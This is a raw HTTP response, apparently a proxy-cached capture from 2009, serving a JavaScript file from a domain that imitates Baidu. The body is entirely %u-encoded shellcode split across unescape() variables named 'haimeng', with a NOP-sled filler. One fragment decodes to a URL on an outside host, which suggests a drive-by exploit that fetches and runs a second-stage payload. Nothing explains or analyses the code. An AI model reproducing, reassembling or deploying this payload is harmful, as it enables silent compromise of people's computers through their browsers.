HTTP/1.1 200 OK
Content-Length: 1862
ETag: "04e5da0cb90c91:5af"
Date: Mon, 23 Feb 2009 02:18:08 GMT
Last-Modified: Tue, 17 Feb 2009 06:47:40 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://baidu-baiduyi.cn/cx.js
X-Polipo-Date: Mon, 23 Feb 2009 02:39:54 GMT
X-Polipo-Access: Mon, 23 Feb 2009 03:45:11 GMT

var haimeng14=unescape("%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1");
var haimeng16=unescape("%u90"+"90");
var haimeng99=unescape("%u212e");
var haimeng15=unescape("%u7468%u7074%u2f3a%u6c2f%u622e%u6775%u7578%u2e65%u6f63%u2f6d%u7771%u7265%u632f%u2e78%u7363%u0073");
var haimeng11=unescape("%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97");
var haimeng4=unescape("%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa");
var haimeng6=unescape("%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb");
var haimeng2=unescape("%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7");
var haimeng=unescape("%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef");
var haimeng0=unescape("%u0feb%u335b%u66c9%u80b9");
var haimeng12=unescape("%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b");
var haimeng8=unescape("%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64");
var haimeng9=unescape("%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef");
var haimeng1=unescape("%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1");
var haimeng7=unescape("%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf");
var haimeng3=unescape("%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b");
var haimeng13=unescape("%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4");
var haimeng5=unescape("%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9");
var haimeng10=unescape("%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c");
